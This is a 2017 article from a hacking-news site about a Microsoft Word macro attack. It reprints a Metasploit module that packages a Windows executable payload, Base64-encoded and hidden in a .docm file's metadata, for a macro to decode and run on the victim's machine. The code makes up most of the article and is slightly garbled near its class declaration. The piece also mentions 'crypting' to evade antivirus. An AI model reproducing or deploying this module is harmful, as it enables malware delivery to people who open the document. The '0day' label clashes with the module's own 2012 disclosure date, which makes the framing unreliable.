• Home
  • About Us
  • Authors
  • Submit News
  • Contact Us
  • Privacy Policy
  • Sitemap
The Hack Post
  • Hacking News
    • Cyber Crime
  • Cyber Security
  • Technology
    • Internet
  • Entertainment
    • Gaming
  • Business
  • Science / Health
No Result
View All Result
The Hack Post
No Result
View All Result

Microsoft Word Macro Execution 0day Exploit Found

Alizaib Hassan by Alizaib Hassan
February 9, 2017
Microsoft Word Macro Execution 0day Exploit Found
Share on FacebookShare on Twitter

An exploit in Microsoft Office Word has been discovered allowing hackers to execute malicious macro-based codes. Attackers can run the exploit in Metasploit and embed a macro virus into a Microsoft Word document.

According to WikiPedia:

A macro virus is a virus that is written in a macro language: a programming language which is embedded inside a software application (e.g., word processors and spreadsheet applications). Some applications, such as Microsoft Office, Excel, Power point allow macro programs to be embedded in documents such that the macros are run automatically when the document is opened, and this provides a distinct mechanism by which malicious computer instructions can spread. This is one reason it can be dangerous to open unexpected attachments in e-mails. Many antivirus programs can detect macro viruses, however they are still difficult to detect and its spread from the network.

A hacker injecting this exploit into a network of computers can be destructive. A virus such as this can spread like bacteria in a petri-dish. Especially in this day and age where files are always transferred from one computer to another, not just in schools but also at work places and of course amongst friends and families. The virus can spread to millions of computers within just a few months, weeks, days or even hours.

The exploit was uploaded to an exploit database by an internet user going by the alias of sinn3r, with the whole code being available for anyone to use. It is unsure whether sinn3r is the original author of the exploit as of yet.

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rex/zip'

class MetasploitModule "Microsoft Office Word Malicious Macro Execution",
'Description' => %q{
This module generates a macro-enabled Microsoft Office Word document. The comments
metadata in the data is injected with a Base64 encoded payload, which will be
decoded by the macro and execute as a Windows executable.

For a successful attack, the victim is required to manually enable macro execution.
},
'License' => MSF_LICENSE,
'Author' =>
[
'sinn3r' # Metasploit
],
'References' =>
[
['URL', 'https://en.wikipedia.org/wiki/Macro_virus']
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
'DisablePayloadHandler' => true
},
'Platform' => 'win',
'Targets' =>
[
['Microsoft Office Word', {}],
],
'Privileged' => false,
'DisclosureDate' => "Jan 10 2012",
'DefaultTarget' => 0
))

register_options([
OptString.new("BODY", [false, 'The message for the document body', '']),
OptString.new('FILENAME', [true, 'The Office document macro file', 'msf.docm'])
], self.class)
end

def on_file_read(short_fname, full_fname)
buf = File.read(full_fname)

case short_fname
when /document\.xml/
buf.gsub!(/DOCBODYGOESHER/, datastore['BODY'])
when /core\.xml/
b64_payload = ' ' * 55
b64_payload << Rex::Text.encode_base64(generate_payload_exe)
buf.gsub!(/PAYLOADGOESHERE/, b64_payload)
end

# The original filename of __rels is actually ".rels".
# But for some reason if that's our original filename, it won't be included
# in the archive. So this hacks around that.
case short_fname
when /__rels/
short_fname.gsub!(/\_\_rels/, '.rels')
end

yield short_fname, buf
end

def package_docm(path)
zip = Rex::Zip::Archive.new

Dir["#{path}/**/**"].each do |file|
p = file.sub(path+'/','')

if File.directory?(file)
print_status("Packaging directory: #{file}")
zip.add_file(p)
else
on_file_read(p, file) do |fname, buf|
print_status("Packaging file: #{fname}")
zip.add_file(fname, buf)
end
end
end

zip.pack
end

def exploit
print_status('Generating our docm file...')
path = File.join(Msf::Config.install_root, 'data', 'exploits', 'office_word_macro')
docm = package_docm(path)
file_create(docm)
super
end
end

Viruses embedded into other forms and formats of files can also be easily go unnoticed by anti-viruses. Silent viruses and macro viruses such as this one can easily be made undetectable by a method called crypting. Methods such as these have existed since the very first virus was ever created. With time, hackers have gotten smarter and so have their destructive viruses and methods of undetectability.

Tags: Microsoft Word Exploit
Alizaib Hassan

Alizaib Hassan

Writer and content creator at The Hack Post. My adamant love for blogging, web development and programming has made me realise that contributing what I know is not only educative but also fun. Discussing topics with others is what drove me to become an author and I love every single moment of it. Founder of www.azhblog.com

Next Post
Australian, New South Wales Government County Council Hacked by NeT.Defacer

Australian, New South Wales Government County Council Hacked by NeT.Defacer

Latest Articles

Zen Your Condo Tips for a Tranquil Space
Business

Zen Your Condo: Tips for a Tranquil Space

May 8, 2025
4 Hobbies for Introverts
news

4 Hobbies for Introverts

May 3, 2025
5 Benefits of Living in a Condo for Professionals
news

5 Benefits of Living in a Condo for Professionals

April 22, 2025
Are German Proxies Legal? The Complete 2025 Guide
Technology

Are German Proxies Legal? The Complete 2025 Guide

April 16, 2025
5 Ideas for Your Condo Console Gaming Setup
news

5 Ideas for Your Condo Console Gaming Setup

April 11, 2025
5 Creative Ideas to Level Up Your Condo Gaming Room
news

5 Creative Ideas to Level Up Your Condo Gaming Room

March 30, 2025
6 Helpful Tips when Moving with Your Pet
news

6 Helpful Tips when Moving with Your Pet

March 19, 2025
Enhancing Security Measures for A Seamless Mobile Trading Experience
Technology

Enhancing Security Measures for A Seamless Mobile Trading Experience

March 19, 2025
5 Ways Condos Support Health-Conscious Living
Science / Health

5 Ways Condos Support Health-Conscious Living

March 8, 2025
The Future of Mobile Gaming 5G, Al, and Cloud Inclusion
Entertainment

The Future of Mobile Gaming: 5G, Al, and Cloud Inclusion

February 21, 2025
Leveraging Digital Twins for Cost-Effective Decarbonisation and Avoiding Stranded Assets
Technology

Leveraging Digital Twins for Cost-Effective Decarbonisation and Avoiding Stranded Assets

February 20, 2025
Condo Bedroom Design Tips for Better Sleep
news

Condo Bedroom Design Tips for Better Sleep

February 13, 2025
  • Home
  • About Us
  • Authors
  • Submit News
  • Contact Us
  • Privacy Policy
  • Sitemap

The Hack Post © 2019

No Result
View All Result
  • Hacking News
    • Cyber Crime
  • Cyber Security
  • Technology
    • Internet
  • Entertainment
    • Gaming
  • Business
  • Science / Health

The Hack Post © 2019